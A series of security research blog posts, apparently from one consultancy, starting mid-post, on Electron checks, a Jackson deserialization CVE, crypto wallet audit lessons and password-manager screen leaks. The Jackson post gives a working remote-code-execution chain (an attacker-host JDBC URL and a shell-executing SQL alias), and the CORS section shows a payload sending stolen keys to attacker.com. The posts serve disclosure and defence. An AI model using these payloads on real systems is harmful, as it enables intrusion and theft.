When specified, renderers with the same affinity will run in the same renderer process. Due to this reuse of the renderer process, certain webPreferences options will also be shared between the web pages, even when you specify different values for them. This can lead to unexpected security configuration overrides:

Affinity Property Vulnerability

In the above demo, the affinity set between the two BrowserWindow objects causes the unwanted sharing of the nodeIntegration property value. Electronegativity will now issue a finding reporting the usage of this flag, if present.
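
A minimal sketch of the misconfiguration (the affinity value and URL are illustrative):

const { app, BrowserWindow } = require('electron')

app.on('ready', () => {
  // Both windows share one renderer process due to the same affinity,
  // so the first window's nodeIntegration:true silently applies to the
  // second window as well, despite being explicitly disabled there
  const trusted = new BrowserWindow({
    webPreferences: { affinity: 'main', nodeIntegration: true }
  })
  const untrusted = new BrowserWindow({
    webPreferences: { affinity: 'main', nodeIntegration: false }
  })
  untrusted.loadURL('https://example.com')
})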

Read more on the dedicated AFFINITY_GLOBAL_CHECK wiki page.

AllowPopups Check

When the allowpopups attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default.

Read more on the ALLOWPOPUPS_HTML_CHECK wiki page.

Missing Electron Security Patches Detection

This check detects if there are security patches available for the Electron version used by the target application. Starting with this release, we switched from manually updating a file of safe releases to a routine that automatically fetches the latest releases from Electron’s official repository and determines at each run whether security patches are available.

Read more on the AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK and ELECTRON_VERSION_JSON_CHECK wiki pages.

Check for Custom Command Line Arguments

This check will compare the custom command line arguments set in the package.json scripts and configuration objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture.

Read more on the CUSTOM_ARGUMENTS_JSON_CHECK wiki page.

CSP Presence Check and Review

Electronegativity now checks if a Content Security Policy (CSP) is set as an additional layer of protection against cross-site scripting and data injection attacks. If a CSP is detected, it will look for weak directives by using a new library based on the csp-evaluator.withgoogle.com online tool.

Read more on the CSP_GLOBAL_CHECK wiki page.

Dangerous JS Functions called with user-supplied data

Looks for occurrences of insertCSS, executeJavaScript, eval, Function, setTimeout, setInterval and setImmediate with user-supplied input.
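
As an illustration, here is a hypothetical renderer snippet that this check would flag (the function names inside the evaluated strings are made up):

// user-controlled data flowing into eval-like sinks
var userInput = decodeURIComponent(location.hash.slice(1))
eval('showMessage("' + userInput + '")')           // flagged
setTimeout('refresh("' + userInput + '")', 1000)   // flagged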

Read more on the DANGEROUS_FUNCTIONS_JS_CHECK wiki page.

Check for mitigations set to limit the navigation flows

Detects if the on() handler for the will-navigate and new-window events is used. These handlers can limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under the full control of remote origins in case of accidental navigation.
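
A minimal mitigation sketch along the lines of Electron’s security recommendations (the trusted origin is illustrative):

const { app } = require('electron')
const { URL } = require('url')

app.on('web-contents-created', (event, contents) => {
  // block navigation to anything outside the trusted origin
  contents.on('will-navigate', (event, navigationUrl) => {
    if (new URL(navigationUrl).origin !== 'https://app.example.com') {
      event.preventDefault()
    }
  })
  // deny the creation of new windows altogether
  contents.on('new-window', (event) => {
    event.preventDefault()
  })
})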

Read more on the LIMIT_NAVIGATION_GLOBAL_CHECK and LIMIT_NAVIGATION_JS_CHECK wiki pages.

Detects if Electron’s security warnings have been disabled

The tool will check if Electron’s warnings and recommendations printed to the developer console have been force-disabled by the developer. Disabling these warnings may hide the presence of misconfigurations or insecure patterns from the developers.

Read more on the SECURITY_WARNINGS_DISABLED_JS_CHECK and SECURITY_WARNINGS_DISABLED_JSON_CHECK wiki pages.

Detects if setPermissionRequestHandler is missing for untrusted origins

Not enforcing custom checks for permission requests (e.g. media) leaves the Electron application under the full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio/video. Because of this, Electronegativity will also check whether a setPermissionRequestHandler has been set.
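
A minimal handler sketch (the trusted origin is illustrative):

const { session } = require('electron')

session.defaultSession.setPermissionRequestHandler((webContents, permission, callback) => {
  const requestingUrl = webContents.getURL()
  // deny media access unless requested by the trusted origin
  if (permission === 'media' && !requestingUrl.startsWith('https://app.example.com/')) {
    return callback(false)
  }
  callback(true)
})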

Read more on the PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK wiki page.

…and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron security pitfalls affect your application and how to avoid them. We really believe that Electron deserves a strong security community behind it, and that creating the right, robust tools to help this community is the first step towards improving the security stance of the whole Electron ecosystem.

As a final remark, we’d like to thank all past and present contributors to this tool: @ikkisoft, @p4p3r, @0xibram, @yarlob, @lorenzostella, and ultimately @Doyensec for sponsoring this release.

See you in Vegas!

@lorenzostella

Electron Security Workshop

2-Day Training on How to Build Secure Electron Applications

We are excited to present our brand-new class on Electron Security! This blog post provides a general overview of the 2-day workshop.

ElectronJS Logo

With the increasing popularity of the ElectronJS framework, we decided to create a class that teaches students how to build and maintain secure desktop applications that are resilient to attacks and common classes of vulnerabilities. Building secure Electron applications is possible, but complicated. You need to know the framework, follow its evolution, and constantly update and devise defense-in-depth mechanisms to mitigate its deficiencies.

Our training begins with an overview of Electron internals and the life cycle of a typical Electron-based application. After a quick intro, we will jump straight into threat modeling and attack surface analysis. We will analyze the common root causes of misconfigurations and vulnerabilities. The class is centered around two main topics: subverting the framework and breaking the custom application code. We will present security misconfigurations, security anti-patterns, nodeIntegration and sandbox bypasses, insecure preload bugs, prototype pollution attacks, affinity abuses and much more.

The class is hands-on with many live examples. The exercises and scenarios will help students understand how to identify vulnerabilities and build mitigations. Throughout the class, we will also have a few Q&A panels to answer all questions attendees might have and potentially review their code.


Audience Profile

Who should take this course?

  • JavaScript and Node.js Developers
  • Security Engineers
  • Security Auditors and Pentesters

We will provide details on how to find and fix security vulnerabilities, which makes this class suitable for both blue and red teams. Basic JavaScript development experience and basic understanding of web application security (e.g. XSS) is required.

General Information

Attendees will receive a bundle with all material, including:

  • Workshop presentation (over 200 slides)
  • Code, exploits and artifacts of all exercises
  • Certificate of completion

This 2-day training is delivered in English, either remotely or on-site (worldwide).

Doyensec will accept up to 15 attendees per tutor. If the number of attendees exceeds the maximum allowed, Doyensec will allocate additional tutors.

We’re a flexible security boutique and can further customize the agenda to your specific company’s needs.

Feel free to contact us at [email protected] for scheduling your class!

Jackson gadgets - Anatomy of a vulnerability

Jackson CVE-2019-12384: anatomy of a vulnerability class

During one of our engagements, we analyzed an application which used the Jackson library for deserializing JSON. In that context, we identified a deserialization vulnerability where we could control the class to be deserialized. In this article, we want to show how an attacker may leverage this deserialization vulnerability to trigger attacks such as Server-Side Request Forgery (SSRF) and remote code execution.

This research also resulted in a new CVE (CVE-2019-12384) and a number of RedHat products affected by it:

Vulnerability Impact

What is required?

As reported by Jackson’s author in On Jackson CVEs: Don’t Panic — Here is what you need to know, the requirements for a Jackson “gadget” vulnerability are:

  • (1) The application accepts JSON content sent by an untrusted client (composed either manually or by code you did not write and have no visibility or control over) — meaning that you cannot constrain the JSON itself that is being sent

  • (2) The application uses polymorphic type handling for properties with a nominal type of java.lang.Object (or one of a small number of “permissive” tag interfaces such as java.util.Serializable, java.util.Comparable)

  • (3) The application has at least one specific “gadget” class to exploit in the Java classpath. In detail, exploitation requires a class that works with Jackson. In fact, most gadgets only work with specific libraries — e.g. the most commonly reported ones work with JDK serialization

  • (4) The application uses a version of Jackson that does not (yet) block the specific “gadget” class. There is a set of published gadgets which grows over time, so it is a race between people finding and reporting gadgets and the patches. Jackson operates on a blacklist: deserialization is a “feature” of the platform, and the maintainers continually update a blacklist of known gadgets that people report.

In this research we assumed that the preconditions (1) and (2) are satisfied. Instead, we concentrated on finding a gadget that could meet both (3) and (4). Please note that Jackson is one of the most used deserialization frameworks for Java applications where polymorphism is a first-class concept. Finding these conditions comes at zero-cost to a potential attacker who may use static analysis tools or other dynamic techniques, such as grepping for @class in request/responses, to find these targets.

Preparing for the battlefield

During our research we developed a tool to assist in the discovery of such vulnerabilities. When Jackson deserializes ch.qos.logback.core.db.DriverManagerConnectionSource, this class can be abused to instantiate a JDBC connection. JDBC stands for (J)ava (D)ata(b)ase (C)onnectivity. JDBC is a Java API to connect to and run queries against a database, and it is part of Java SE (Java Standard Edition). Moreover, JDBC uses automatic string-to-class mapping, making it a perfect target to load and execute even more “gadgets” inside the chain.

In order to demonstrate the attack, we prepared a wrapper in which we load arbitrary polymorphic classes specified by an attacker. For the environment we used jRuby, a ruby implementation running on top of the Java Virtual Machine (JVM). With its integration on top of the JVM, we can easily load and instantiate Java classes.

We’ll use this setup to load Java classes easily in a given directory and prepare the Jackson environment to meet the first two requirements (1,2) listed above. In order to do that, we implemented the following jRuby script.

require 'java'
Dir["./classpath/*.jar"].each do |f|
	require f
end
java_import 'com.fasterxml.jackson.databind.ObjectMapper'
java_import 'com.fasterxml.jackson.databind.SerializationFeature'

content = ARGV[0]

puts "Mapping"
mapper = ObjectMapper.new
mapper.enableDefaultTyping()
mapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);
puts "Serializing"
obj = mapper.readValue(content, java.lang.Object.java_class) # invokes all the setters
puts "objectified"
puts "stringified: " + mapper.writeValueAsString(obj)

The script proceeds as follows:

  1. At line 2, it loads all of the classes contained in the Java Archives (JAR) within the “classpath” subdirectory
  2. Between lines 5 and 13, it configures Jackson in order to meet requirement (2)
  3. Between lines 14 and 17, it deserializes and serializes a polymorphic Jackson object passed to jRuby as JSON

Memento: reaching the gadget

For this research we decided to use gadgets that are widely used by the Java community. All the libraries targeted in order to demonstrate this attack are in the top 100 most common libraries in the Maven central repository.

To follow along and to prepare for the attack, you can download the libraries used throughout this post (jackson-databind, logback-core and h2) and put them in the “classpath” directory.

It should be noted that the h2 library is not required to perform the SSRF attack, since our experience suggests that most Java applications load at least one JDBC driver. JDBC drivers are classes that, when a JDBC URL is passed in, are automatically instantiated and receive the full URL as an argument.

Using the following command, we will call the previous script with the aforementioned classpath.

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:\"}]"

On line 15 of the script, Jackson will recursively call all of the setters with the keys contained inside the subobject. To be more specific, setUrl(String url) is called with our argument by the Jackson reflection library. After that phase (line 17) the full object is serialized into a JSON object again. At this point all the fields are serialized directly, if no getter is defined, or through an explicit getter. The interesting getter for us is getConnection(). In fact, as an attacker, we are interested in all “non-pure” methods that have interesting side effects where we control an argument.

When getConnection is called, an in-memory database is instantiated. Since the application is short-lived, we won’t see any meaningful effect from the attacker’s perspective. In order to do something more meaningful we create a connection to a remote database. If the target application is deployed as a remote service, an attacker can trigger a Server-Side Request Forgery (SSRF). The following screenshot is an example of this scenario.
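
For instance, pointing the JDBC URL at an attacker-controlled host (the hostname below is illustrative) is enough to generate outbound traffic from the target:

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://attacker.example.com:9092/mem:poc\"}]"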

Jackson Chain

Enter the Matrix: From SSRF to RCE

As you may have noticed, both of these scenarios lead to DoS and SSRF. While those attacks may affect the application security, we want to show you a simple and effective technique to turn an SSRF into a full chain RCE.

In order to gain full code execution in the context of the application, we employed the capability of loading the H2 JDBC driver. H2 is a super-fast SQL database usually employed as an in-memory replacement for full-fledged SQL Database Management Systems (such as PostgreSQL, MSSQL, MySQL or OracleDB). It is easily configurable and supports many modes, such as in-memory, on file, and on remote servers. H2 has the capability to run SQL scripts from the JDBC URL, which was added in order to have an in-memory database that supports init migrations. This alone won’t allow an attacker to actually execute Java code inside the JVM context. However, since H2 is implemented inside the JVM, it has the capability to specify custom aliases containing Java code. This is what we can abuse to execute arbitrary code.

We can easily serve the following inject.sql INIT file through a simple HTTP server, such as Python’s built-in one (e.g. python -m SimpleHTTPServer).

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('id > exploited.txt')

And run the tester application with:

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"
...
$ cat exploited.txt
uid=501(...) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),501(access_bpf),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh)

Voilà!

Iterative Taint-Tracking

Exploitation of deserialization vulnerabilities is complex and takes time. When conducting a product security review, time constraints can make it difficult to find the appropriate gadgets to use in exploitation. On the other hand, the Jackson blacklists are updated on a monthly basis, while users of this mechanism (e.g. enterprise applications) may have yearly release cycles.

Deserialization vulnerabilities are the typical needle-in-the-haystack problem. Identifying a vulnerable entry point is an easy task, while finding a useful gadget may be time-consuming (and tedious). At Doyensec we developed a technique to find useful Jackson gadgets to facilitate the latter effort. We built a static analysis tool that can find serialization gadgets through taint-tracking analysis. We designed it to be fast enough to run multiple times and iterate/improve through a custom and extensible rule-set language. On average, a run on a 2018 MacBook Pro i7 takes 2 minutes.

Jackson Taint Tracking

Taint-tracking is a topical academic research subject. Academic research tools focus on very high recall and precision; the trade-off lies between high recall/precision and speed/memory. Since we wanted this tool to be usable while testing commercial-grade products, and we valued the customizability of the tool itself, we focused on speed and usability instead of high recall. While the tool is inspired by other research such as FlowDroid, the focus of our technique is not to rule out the human analyst. Instead, we believe in augmenting manual testing and exploitation with customizable security automation.

This research was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

That’s all folks! Keep it up and be safe!

Lessons in auditing cryptocurrency wallets, systems, and infrastructures

In the past three years, Doyensec has been providing security testing services for some of the global brands in the cryptocurrency world. We have audited desktop and mobile wallets, exchange web interfaces, custody systems, and backbone infrastructure components.

We have seen many things done right, but we have also discovered many design and implementation vulnerabilities. Failure is a great lesson in security and can always be turned into positive teaching for the future. Learning from past mistakes is the key to creating better systems.

Vulnerability Impact

In this article, we will guide you through a selection of four simple (yet dangerous!) application vulnerabilities.

Breaking Crypto Currency Systems != Breaking Crypto (at least not always)

For that, you would probably need to wait for Jean-Philippe Aumasson’s talk at the upcoming BlackHat Vegas.

This blog post was brought to you by Kevin Joensen and Mateusz Swidniak.

1) CORS Misconfigurations

Cross-Origin Resource Sharing (CORS) is used for relaxing the Same-Origin Policy. This mechanism enables communication between websites hosted on different domains. A misconfigured CORS policy can have a great impact on the website’s security posture, as other sites might be able to access the page content.

Imagine a website with the following HTTP response headers:

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

If an attacker has successfully lured a victim to their website, they can easily issue an HTTP request with a null origin using an iframe tag and a sandbox attribute.

<!-- attacker.com page: the sandboxed iframe forces a null origin -->
<iframe sandbox="allow-scripts" src="https://attacker.com/corsbug"></iframe>

<!-- content of https://attacker.com/corsbug -->
<html>
<body>
<script>
var req = new XMLHttpRequest();
req.onload = callback;
req.open('GET', 'https://bitcoinbank/keys', true);
req.withCredentials = true;
req.send();

function callback() {
    location='https://attacker.com/?dump='+this.responseText;
};
</script>
</body>
</html>

When the victim visits the crafted page, the attacker can perform a request to https://bitcoinbank/keys and retrieve their secret keys.

This can also happen when the Access-Control-Allow-Origin response header is dynamically updated to the same domain as specified by the Origin request header.
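
For example (a hypothetical request/response pair):

GET /keys HTTP/1.1
Host: bitcoinbank
Origin: https://attacker.com
Cookie: sessionid=[...]

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true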

Checklist:

  • Ensure that your Access-Control-Allow-Origin is never set to null
  • Ensure that Access-Control-Allow-Origin is not taken from a user-controlled variable or header
  • Ensure that you are not dynamically copying the value of the Origin HTTP header into Access-Control-Allow-Origin (see the sketch after this checklist)
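
A minimal allowlist-based sketch in Node.js/Express (the origins are illustrative):

const express = require('express')
const app = express()

const ALLOWED_ORIGINS = ['https://app.example.com', 'https://admin.example.com']

app.use((req, res, next) => {
  const origin = req.headers.origin
  // reflect the Origin header only on an exact allowlist match;
  // everything else receives no CORS headers at all
  if (ALLOWED_ORIGINS.includes(origin)) {
    res.setHeader('Access-Control-Allow-Origin', origin)
    res.setHeader('Access-Control-Allow-Credentials', 'true')
  }
  next()
})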

2) Asserts and Compilers

In some programming languages, optimizations performed by the compiler can have undesirable results. This could manifest in many different quirks due to specific compiler or language behaviors; however, there is a specific class of idiosyncrasies that can have devastating effects.

Let’s consider this Python code as an example:

# All deposits should belong to the same CRYPTO address
assert all([x.deposit_address == address for x in deposits])

At first sight, there is nothing wrong with this code. Yet, there is actually a quite severe bug. The problem is that Python runs with __debug__ enabled by default, which allows assert statements like the security control illustrated above. When the code gets compiled to optimized bytecode (*.pyo files) and lands in production, all asserts are gone. As a result, the application will not enforce any security checks.
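
This is easy to demonstrate from a shell:

$ python -c 'assert False, "security check"; print("unreachable")'
Traceback (most recent call last):
  File "<string>", line 1, in <module>
AssertionError: security check
$ python -O -c 'assert False, "security check"; print("asserts are gone")'
asserts are gone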

Similar behaviors exist in many languages and with different compiler options, including C/C++, Swift, Closure and many more.

For example, let’s consider the following Swift code:

// assertionFailure is stripped out by release optimizations,
// so any password is accepted in builds compiled with -O
if (password != "mysecretpw") {
   assertionFailure("Password not correct!")
}

If you were to run this code in Xcode, it would simply hit your assertionFailure in case of an incorrect password. This is because Xcode compiles the application without any optimizations, using the -Onone flag. If you were to build the same code for the App Store instead, the check would be optimized out, leading to no password check at all since the execution continues. Note that there are many things wrong in those three lines of code.

Talking about assertions, PHP takes first place and de facto facilitates RCE when you run asserts with a string argument. This is due to the argument being evaluated through the standard eval.

Checklist:

  • Do not use assert statements for guarding code and enforcing security checks
  • Research for compiler optimizations gotchas in the language you use

3) Arithmetic Errors

A bug class that is also easy to overlook in fin-tech systems pertains to arithmetic operations. Negative numbers and overflows can create money out of thin air.

For example, let’s consider a withdrawal function that checks the amount of money in a certain wallet before approving the transfer. Being able to pass a negative number could be abused to generate money for that account.

Imagine the following example code:

if data["wallet"].balance < data["amount"]:
    error_dict["wallet_balance"] = ("Withdrawal exceeds available balance")
...    
data["wallet"].balance = data["wallet"].balance - data["amount"]

The if statement correctly checks whether the balance is higher than the requested amount. However, the code does not enforce that the amount is a positive number.

Let’s try withdrawing -100 coins from a wallet holding 200 coins.

The check would be satisfied and the code responsible for updating the amount would look like the following:

data["wallet"].balance = 200 - (-100) # 300 coins

This would enable an attacker to get free money out of the system.

Talking about numbers and arithmetic, there are also well-known bugs affecting lower-level languages, in which signed vs unsigned types come into play.

In most architectures, a signed short integer is a 2-byte type that can hold both negative and positive numbers. In memory, positive numbers are represented as 1 == 0x0001, 2 == 0x0002 and so forth. Negative numbers, instead, are represented as two’s complement: -1 == 0xffff, -2 == 0xfffe and so forth. The two ranges meet at 0x7fff, which enables a signed short integer to hold a value between -32768 and 32767.

Let’s take a look at an example with pseudo-code:

signed short int bank_account = -30000

Assuming the system still allows withdrawals (e.g. perhaps a loan), the following code will be exercised:

int withdraw(signed short int money){
    bank_account -= money
}

As we know, the maximum negative value is -32768. What happens if a user withdraws 2768 + 1?

withdraw(2769); //32767

Yes! No longer in debt thanks to integer wrapping. Current balance is now 32767.

Checklist:

  • Verify that the transaction systems and other components dealing with financial arithmetic do not accept negative numbers
  • Verify integer boundaries, and whether correct signed vs unsigned types are used across the entire codebase. Note that signed integer overflow is considered undefined behavior.

4) Password Reset Token Leakage Via Referer

Last but not least, we would like to introduce a simple infoleak bug. This is a very widespread issue present in the password reset mechanism of many web platforms.

Vulnerability Impact

A standard procedure for a password reset in modern web applications involves the use of a secret link sent out to the user via email. The secret is used as an authentication token to prove that the recipient had access to the email associated with the user’s registration.

Those links typically take the form of https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320 or https://example.com/passwordreset?token=2a8c5d7e-5c2c-4ea6-9894-b18436ea5320.

But what actually happens when the user clicks the link?

When a web browser requests a resource, it typically adds an HTTP header, called the Referer header, indicating the URL of the resource from which the request originated. If the resource being requested resides on a different domain, the Referer header is still generally included in the cross-domain request. It is not uncommon for the password reset page to load external JavaScript resources such as libraries and tracking code. Under those circumstances, the password reset token will also be sent to the third-party domains.

GET /libs/jquery.js HTTP/1.1
Host: 3rdpartyexampledomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Referer: https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320
Connection: close

As a result, personnel working for the affected third-party domains, having access to the web server access logs, might be able to take over accounts of the vulnerable web platform.

Checklist:

  • If possible, applications should never transmit any sensitive information within the URL query string
  • In case of password reset links, the Referer header should always be removed using one of the following techniques:
    • Blank landing page under the web platform domain, followed by a redirect
    • Originate the navigation from a pseudo-URL document, such as data: or javascript:
    • Using <iframe src=about:blank>
    • Using <meta name="referrer" content="no-referrer" />
    • Setting an appropriate Referrer-Policy header, assuming your application supports recent browsers only

If you would like to talk about securing your platform, contact us at [email protected]!

One Bug To Rule Them All: Modern Android Password Managers and FLAG_SECURE Misuse

A few months ago I stumbled upon a 2016 blog post by Mark Murphy, warning about the state of FLAG_SECURE window leaks in Android. This class of vulnerabilities has been around for a while, hence I wasn’t confident that I could still leverage the same weakness in modern Android applications. As it often turns out, I was being too optimistic. After a brief survey, I discovered that the issue still persists today in many password manager applications (and others).

The problem

The FLAG_SECURE setting was initially introduced as an additional setting to WindowManager.LayoutParams to prevent DRM-protected content from appearing in screenshots, video screencaps or from being viewed on “non-secure displays”.

This last term was created to distinguish between virtual screens created by the MediaProjection API (a native API to capture screen contents) and physical display devices like TV screens (having a DRM-secure video output). In this way Google forestalled the piracy apps issue by preventing unsigned apps from creating virtual “secure” displays, only allowing casting to physical “secure” devices.

While FLAG_SECURE nowadays serves its original purpose well (to the delight of e.g. Netflix, Google Play Movies, Youtube Red), developers over the years have mistaken this “secure” flag for an easy catch-all security feature provided by Android to exclude the entire app from any screen capture or recording.

Unfortunately, this functionality is not global for the entire app; it can only be set on the specific screens that contain sensitive data. To make matters worse, Android fragments used in the application do not respect the FLAG_SECURE set for the activity and won’t pass the flag down to any other Window instances created on behalf of that activity. As a consequence, several native UI components like Spinner, Toast, Dialog, PopupWindow and many others will still leak their content to third-party applications having the right permissions.

The approach

After a short survey, I decided to investigate a category of apps in which a content leak would have the biggest impact: mobile password managers. This is also the category of applications a generic attacker would probably choose to target first, along with banking apps.

With this in mind, I fired up a screen capture application (mnml) and started poking around. After a few days of testing, all four of the Android password managers examined were found to be vulnerable to some extent.

The following sections provide a summary of the discovered issues. All vulnerabilities were disclosed to the vendors throughout the second week of May 2019.

1Password

In 1Password, the Account Settings section offers a way to manage 1Password accounts. One of the functionalities is “Large Type”, which allows showing an account’s Secret Key in a large, easy-to-read format. The fragment showing the Secret Key leaks it to third-party applications installed on the victim’s device. The Secret Key is combined with the user’s Master Password to create the full encryption key used to encrypt the account’s data, protecting it on the server side.

1Password Secret Key Leak Vulnerability

This was fixed in 1Password for Android in version 7.1.5, which was released on May 29, 2019.

Keeper

When a user taps the password field, Keeper shows a “Copied to Clipboard” toast. If the user reveals the cleartext password with the “Eye” icon, the toast will also contain the secret cleartext password. The fragment showing the copied password leaks it to third-party applications.

Keeper Password Leak Vulnerability (without FLAG_SECURE set) Keeper Password Leak Vulnerability (with FLAG_SECURE set)

This was fixed in Keeper for Android version 14.3.0, which was released on June 21, 2019. An official advisory was also issued.

Dashlane

Dashlane features a random password generation functionality, usable when an account entry is inserted or edited. Unfortunately, the window responsible for choosing the parameters for the “safe” passwords is visible to third-party applications on the victim’s device.

Dashlane Password Leak Vulnerability

Note that it is also possible for an attacker to infer the service associated with the leaked password, since the services list and autocomplete fragment is also missing the FLAG_SECURE flag, resulting in its leak.

Dashlane Leak Vulnerability Dashlane Leak Vulnerability

The issue was fixed in Dashlane for Android in version 6.1929.2.

The attack scenario

Several scenarios would result in an app being installed on a user’s phone recording their activity. These include:

  • Malicious casting apps requiring record permission, since users usually don’t know that casting apps can also record their screen;
  • Innocuous-looking apps using Cloak & Dagger attacks;
  • Malicious app installed through third-party Android app stores or bypassing PHA detection filters of the Play Store;
  • Malicious app pushed to the smartphone using the Play Store feature in a Man-in-the-Browser attack scenario;

If these scenarios seem unlikely to happen in real life, it is worth noting that there have been several instances of apps abusing this class of attacks in the recent past.

Many thanks to the 1Password, Keeper, and Dashlane security teams that handled the report in a professional way, issued a payout, and allowed the disclosure. Please remember that using a password manager is still the best choice these days to protect your digital accounts and that all the above issues are now fixed.

As always, this research was possible thanks to my 25% research time at Doyensec!

Internship at Doyensec

“Our moral responsibility is not to stop the future, but to shape it…” — Alvin Toffler

At Doyensec, we feel responsible for what the future of information security will look like. We want a safe and open Internet and we believe that hackers play an important role. As a part of our give back strategy, we want to find ways of transferring our knowledge to new generations.

Doyensec interns work alongside experienced security researchers during live customer engagements. They receive full time support from senior staff members and are encouraged to explore individual research projects. Additionally, they are included in all team meetings so they can learn and share in the different experiences arising from our work. In short, we want to provide a comprehensive experience on what it means to be a first-class security consultant in the vulnerability research space.

The internship program @Doyensec represents an opportunity to learn new infosec skills. We also hope it becomes a memorable personal experience. It lasts 2-3 months and is a mix of remote and in-person interactions.

We offer each candidate a transparent recruitment process in 3 simple steps:

  • 1) Introductory call to understand one’s motivation for applying and their availability over the upcoming months
  • 2) Online challenges to evaluate technical skillset (web security testing)
  • 3) Final call to discuss details
Doyensec internship process

Day 1

Day one is important. Interns are responsible for setting up their Doyensec-provided machine and will be introduced to the team. Each of them is assigned to a senior security researcher, who will be at their disposal and act as a mentor throughout the entire internship. They will learn how we schedule projects, communicate, and cooperate to ensure complete coverage during our testing activities. We will provide them with all the necessary equipment to perform the work. Most importantly, they will learn about our values and the things that we consider crucial for delivering high quality work.

Time allocation

While the internship is considered full time over the course of 2-3 months, we have had interns who were still studying and wanted to combine work and school. We take pride in having a flexible company culture oriented around results, and our approach to the internship is no different.

“For knowledge work, time spent has little to do with value created and the forty hour workweek is anachronistic nonsense.” — Naval Ravikant @naval

Work days are generally grouped into two categories:

a) Customer projects. Interns work on real-life projects. Whenever possible, we will try to match personal interest and skillset with tasks when allocating projects.

b) Research time. We strongly believe in research and practice, therefore we allow interns to spend 50% of their time on research topics. We will define goals together and provide guidance and feedback on the progress.

Testimonial

Mohamed Ouad is a student of computer science at the University of Milan. In the fall of 2018 he joined Doyensec as our second intern. We asked him a few questions to summarize his experience:

What did you learn during your internship?
“During this period I had the possibility to learn a lot of things, and not just technical stuff. For instance, I understood how to explain findings to non-technical audience and manage projects with strict deadlines.”

Have you improved your skillset?
“Definitely! I improved my knowledge of Android security and got interested in Google Chrome extensions security, static code review and Electron-based apps security.”

Will the internship have an impact on your career?
“This experience has given me a huge added value to my career path. I’ve not only learned a lot, but also created an important item in my curriculum that will be certainly useful for future opportunities. I suggest this “adventure” to everyone!”

More information on our internship program

The Doyensec internship program is open to students returning to full-time education for at least one semester. We accept candidates with residency in either US or Europe.

What do we offer:

  • Opportunity to perform professional security testing for both start ups and Fortune 500 companies
  • Ability to perform cutting-edge offensive research projects
  • Feedback and guidance
  • Attractive financial compensation

What do we expect from candidates?

Our perfect candidate:

  • Already has some experience with manual source code review and Burp Suite / OWASP ZAP
  • Learns quickly
  • Should be able to prepare reports in English
  • Is self-organized
  • Is able to learn from his/her mistakes
  • Has motivation to work/study and show initiative
  • Must be communicative (without this it is difficult to teach effectively)
  • Brings something to the mix (e.g. creativity, academic knowledge, etc.)

In contrast to full-time positions (we are always hiring web and mobile pentesters!), a good attitude is the most important factor we are looking for.

Do you want to join Doyensec as an intern? Apply via our careers portal!

Heap Overflow in F-Secure Internet Gatekeeper

F-Secure Internet Gatekeeper heap overflow explained

This blog post illustrates a vulnerability we discovered in the F-Secure Internet Gatekeeper application. It shows how a simple mistake can lead to an exploitable unauthenticated remote code execution vulnerability.

Reproduction environment setup

All testing should be reproducible in a CentOS virtual machine, with at least 1 processor and 4GB of RAM.

An installation of F-Secure Internet Gatekeeper will be needed. It used to be possible to download it from https://www.f-secure.com/en/business/downloads/internet-gatekeeper. As far as we can tell, the vendor no longer provides the vulnerable version.

The original affected package has the following SHA256 hash: 1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26.

Proceed with the installation:

  1. If you’re using an x64 version of CentOS, execute yum install glibc.i686
  2. Install the Internet Gatekeeper binary using rpm -I <fsigkbin>.rpm
  3. For a better debugging experience, install gdb 8+ and https://github.com/hugsy/gef

Now you can use Ghidra/IDA or your favorite disassembler/decompiler to start reverse engineering Internet Gatekeeper!

The target

As described by F-Secure, Internet Gatekeeper is a “highly effective and easy to manage protection solution for corporate networks at the gateway level”.

F-Secure Internet Gatekeeper contains an admin panel that runs on port 9012/tcp. This may be used to control all of the services and rules available in the product (HTTP proxy, IMAP proxy, etc.). This admin panel is served over HTTP by the fsikgwebui binary which is written in C. In fact, the whole web server is written in C/C++; there are some references to civetweb, which suggests that a customized version of CivetWeb may be in use.

The fact that it was written in C/C++ led us down the road of looking for memory corruption vulnerabilities, which are common in these languages.

It did not take long to find the issue described in this blog post by fuzzing the admin panel with Fuzzotron, which uses Radamsa as its underlying engine. Fuzzotron has built-in TCP support for easily fuzzing network services. As a seed, we extracted a valid POST request used for changing the language on the admin panel. This request can be performed by unauthenticated users, which made it a good candidate for a fuzzing seed.

When analyzing the input mutated by Radamsa, we could quickly see that the root cause of the vulnerability revolved around the Content-Length header. The generated test case that crashed the software had the following header value: Content-Length: 21487483844. This suggested an overflow due to incorrect integer math.

